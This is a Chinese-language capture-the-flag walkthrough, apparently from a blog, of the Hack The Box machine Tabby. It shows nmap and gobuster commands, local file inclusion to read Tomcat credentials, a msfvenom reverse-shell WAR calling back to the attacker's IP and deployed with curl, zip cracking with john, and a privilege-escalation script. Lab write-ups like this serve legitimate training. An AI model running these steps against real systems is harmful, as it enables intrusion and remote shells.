信息收集

IP Address	Opening Ports
10.10.10.194	TCP:22,80,8080

$ nmap -p- 10.10.10.194 --min-rate 1000 -sC -sV

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
|   256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
|_  256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Mega Hosting
|_http-server-header: Apache/2.4.41 (Ubuntu)
8080/tcp open  http    Apache Tomcat
|_http-title: Apache Tomcat

HTTP

http://10.10.10.194/

[Meachines] [Easy] Tabby LFI(pany文件包含漏洞利用工具)+tomca…插图

# echo '10.10.10.194 megahosting.htb'>>/etc/hosts

使用网页链接获取工具

项目地址:https://github.com/MartinxMax/Web-crawlers-get-web-links

[Meachines] [Easy] Tabby LFI(pany文件包含漏洞利用工具)+tomca…插图1

项目地址:https://github.com/MartinxMax/pany

$ python3 pany.py -u 'http://megahosting.htb/news.php?file=*'

[Meachines] [Easy] Tabby LFI(pany文件包含漏洞利用工具)+tomca…插图2

username:tomcat password:$3cureP4s5w0rd123!

tomcat & Text-based manager & war reverse shell

$ gobuster dir -u "http://10.10.10.194:8080/manager" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -b 404,403 -t 50

[Meachines] [Easy] Tabby LFI(pany文件包含漏洞利用工具)+tomca…插图3

[Meachines] [Easy] Tabby LFI(pany文件包含漏洞利用工具)+tomca…插图4

https://tomcat.apache.org/tomcat-8.5-doc/host-manager-howto.html

[Meachines] [Easy] Tabby LFI(pany文件包含漏洞利用工具)+tomca…插图5

命令列表

$ curl -u 'tomcat:$3cureP4s5w0rd123!' http://10.10.10.194:8080/manager/text/list

[Meachines] [Easy] Tabby LFI(pany文件包含漏洞利用工具)+tomca…插图6

$ msfvenom -p java/shell_reverse_tcp lhost=10.10.16.18 lport=10032 -f war -o reverse.war

$ curl -u 'tomcat:$3cureP4s5w0rd123!' http://10.10.10.194:8080/manager/text/deploy?path=/rev --upload-file reverse.war

[Meachines] [Easy] Tabby LFI(pany文件包含漏洞利用工具)+tomca…插图7

$ curl http://10.10.10.194:8080/rev

[Meachines] [Easy] Tabby LFI(pany文件包含漏洞利用工具)+tomca…插图8

User.txt

tomcat to ash

[Meachines] [Easy] Tabby LFI(pany文件包含漏洞利用工具)+tomca…插图9

http://megahosting.htb/files/16162020_backup.zip

[Meachines] [Easy] Tabby LFI(pany文件包含漏洞利用工具)+tomca…插图10

$ zip2john 16162020_backup.zip >hash

$ john --wordlist=/usr/share/wordlists/rockyou.txt hash

[Meachines] [Easy] Tabby LFI(pany文件包含漏洞利用工具)+tomca…插图11

password:admin@it

$ su ash

[Meachines] [Easy] Tabby LFI(pany文件包含漏洞利用工具)+tomca…插图12

User.txt

db89a0405cb8dc95a803de1ed1380033

权限提升:trp00f

$ python3 trp00f.py --lhost 10.10.16.18 --lport 10022 --rhost 10.10.16.18 --rport 10090 --pkhttpport 10033 --lxhttpport 10091 --password 'admin@it'

[Meachines] [Easy] Tabby LFI(pany文件包含漏洞利用工具)+tomca…插图13

Root.txt

4403dace3ed0c861a56d5725763cb5ff

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）

[Meachines] [Easy] Tabby LFI(pany文件包含漏洞利用工具)+tomca…

信息收集

HTTP

tomcat & Text-based manager & war reverse shell

User.txt

tomcat to ash

User.txt

权限提升:trp00f

Root.txt

相关文章

发布评论取消回复

[Meachines] [Easy] Tabby LFI(pany文件包含漏洞利用工具)+tomca…

信息收集

HTTP

tomcat & Text-based manager & war reverse shell

User.txt

tomcat to ash

User.txt

权限提升:trp00f

Root.txt

相关文章：

相关文章

发布评论 取消回复

发布评论取消回复